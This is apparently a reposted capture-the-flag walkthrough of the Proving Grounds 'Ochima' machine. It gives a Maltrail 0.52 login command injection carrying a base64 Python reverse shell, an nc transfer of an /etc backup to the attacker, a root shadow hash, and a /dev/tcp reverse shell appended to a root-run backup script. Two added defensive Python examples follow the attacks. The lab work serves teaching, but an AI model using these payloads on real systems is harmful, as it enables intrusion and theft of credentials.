PG_Ochima

admin, 2025-05-30 12:13:07

Information gathering:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.32
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-27 12:50 CST
Nmap scan report for 192.168.216.32
Host is up (0.0029s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8338/tcp open  unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: Maltrail/0.52
|     Date: Thu, 27 Feb 2025 04:52:34 GMT
|     Connection: close
|     Content-Type: text/html
|     Last-Modified: Sat, 31 Dec 2022 22:58:57 GMT
|     Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline'; img-src * blob:; script-src 'self' 'unsafe-eval' https://stat.ripe.net; frame-src *; object-src 'none'; block-all-mixed-content;
|     Cache-Control: no-cache
|     Content-Length: 7091
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="X-UA-Compatible" content="IE=edge">
|     <meta http-equiv="Content-Type" content="text/html;charset=utf8">
|     <meta name="viewport" content="width=device-width, user-scalable=no">
|     <meta name="robots" content="noindex, nofollow">
|     <title>Maltrail</title>
|     <link rel="stylesheet" type="text/css" href="css/thirdparty.min.css">
|     <link rel="stylesheet" type="text/css" hre
|   HTTPOptions: 
|     HTTP/1.0 501 Unsupported method ('OPTIONS')
|     Server: Maltrail/0.52
|     Date: Thu, 27 Feb 2025 04:52:34 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 500
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 501</p>
|     <p>Message: Unsupported method ('OPTIONS').</p>
|     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Linux 2.6.32 - 3.1 (86%), Infomir MAG-250 set-top box (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT     ADDRESS
1   2.14 ms 192.168.45.1
2   2.14 ms 192.168.45.254
3   2.85 ms 192.168.251.1
4   2.96 ms 192.168.216.32

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.00 seconds

Ports 80 and 8338 are open; port 8338 serves Maltrail, version 0.52.

Over the VPN connection I simply could not get the shell back, so I switched to OffSec's online Kali...

curl http://192.168.55.32:8338/login --data 'username=;`echo+"cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE5Mi4xNjguNDkuNTUiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigiYmFzaCIpJw"+|+base64+-d+|+bash`'

Got a shell.
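The login injection above works because the service hands the submitted username to a shell. The following Python is an added defender's illustration, not Maltrail's code and not from the original post: /bin/echo stands in for the command the service actually runs, and the allowlist is an assumed policy of our own.

```python
import re
import subprocess

# Allowlist for a login field (assumption: our own policy, not Maltrail's).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")
# Characters that mean something to /bin/sh; a useful detection signal on login attempts.
SHELL_META_RE = re.compile(r"[`$;|&<>(){}\\\n]")


def record_login_unsafe(username: str) -> str:
    """Vulnerable pattern: the username is interpolated into a shell command string,
    so backticks, ';' or $(...) inside it are executed by the shell."""
    proc = subprocess.run(f"/bin/echo login {username}", shell=True,
                          capture_output=True, text=True, check=False)
    return proc.stdout


def record_login_argv(username: str) -> str:
    """Fixed pattern: argv list and no shell, so the username is one literal
    argument and nothing inside it is interpreted."""
    proc = subprocess.run(["/bin/echo", "login", username],
                          capture_output=True, text=True, check=False)
    return proc.stdout


def validate_username(username: str) -> bool:
    """Defense in depth: reject anything outside the allowlist before it is used at all."""
    return USERNAME_RE.fullmatch(username) is not None


def looks_like_injection(username: str) -> bool:
    """Detection hook: a login attempt carrying shell metacharacters is worth an alert."""
    return SHELL_META_RE.search(username) is not None


if __name__ == "__main__":
    # Constructed sample input with a harmless marker instead of a real payload.
    payload = "alice;echo INJECTED"
    print(repr(record_login_unsafe(payload)))   # two commands ran
    print(repr(record_login_argv(payload)))     # one command, payload inert
    print(validate_username(payload), looks_like_injection(payload))
```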

Got the local flag.

This box seems to have strict firewall rules: only ports 80 and 8338 are allowed outbound. In the user's home directory I found a file etc_backup.tar, which looks like a backup of /etc.

Transfer the file with nc:

On Kali:
nc -lnvp 8338 > etc_backup.tar
On the target:
cat etc_backup.tar | nc 192.168.49.56 8338

After downloading it I found the shadow file:

root:$y$j9T$VdNCwN5thdnTPXpr87UrZ/$DOfFXgmuYsSQZ5S9GU5faFj8Z/BPpLMD80aEPFmIxt9:19702:0:99999:7:::

I tried john, but it does not support cracking this hash format. Further enumeration turned up an /etc backup script under /var/backups that runs periodically as root.

Append the reverse shell command to the etc_Backup.sh script:

echo "sh -i >& /dev/tcp/192.168.49.56/8338 0>&1" >> etc_Backup.sh

Listen on port 8338; after a short wait a root shell comes back, and with it the proof flag.
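The escalation works because a script that root runs on a schedule is writable by the low-privileged user. As an added example (not from the original post), this Python audit walks the given directories and reports executable files that group or others can write, or that sit in a writable, non-sticky directory; build_demo_tree() constructs a sample tree mirroring the etc_Backup.sh case, with the weak mode beside the corrected one.

```python
import os
import stat
import tempfile
from pathlib import Path

GROUP_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH

def _is_script(path: Path) -> bool:
    """Executable regular files count as scripts for this audit."""
    try:
        st = path.stat()
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & 0o111)

def audit_writable_scripts(roots):
    """Return sorted [(path, reason)] for scripts a non-owner could tamper with.
    'file-writable': group/other may write the script itself.
    'dir-writable': its directory is group/other-writable and not sticky."""
    findings = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            d = Path(dirpath)
            dmode = d.stat().st_mode
            dir_open = bool(dmode & GROUP_OTHER_WRITE) and not (dmode & stat.S_ISVTX)
            for name in files:
                p = d / name
                if not _is_script(p):
                    continue
                if p.stat().st_mode & GROUP_OTHER_WRITE:
                    findings.append((str(p), "file-writable"))
                elif dir_open:
                    findings.append((str(p), "dir-writable"))
    return sorted(findings)

def build_demo_tree() -> str:
    """Constructed sample: a backups directory holding the same script twice,
    once with the weak world-writable mode and once owner-only."""
    base = tempfile.mkdtemp(prefix="audit_demo_")
    backups = Path(base) / "var" / "backups"
    backups.mkdir(parents=True, mode=0o755)
    body = "#!/bin/bash\ntar cf /var/backups/etc_backup.tar /etc\n"
    weak, fixed = backups / "etc_Backup.sh", backups / "etc_Backup_fixed.sh"
    weak.write_text(body)
    weak.chmod(0o777)    # weak setting: any local user can append to a root-run script
    fixed.write_text(body)
    fixed.chmod(0o700)   # corrected setting: owner only
    return base
```

For the demo tree, audit_writable_scripts([build_demo_tree()]) reports only etc_Backup.sh; on a real host point it at the directories whose scripts root executes on a schedule.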

Originally published on the WeChat public account EuSRC安全实验室 (EuSRC Security Lab): PG_Ochima

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any issues, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not filtered; contact details are on the home page).
Reprints must retain the link to this article (CN-SEC中文网; thanks to the original author for their work): PG_Ochima http://cn-sec.com/archives/3945700.html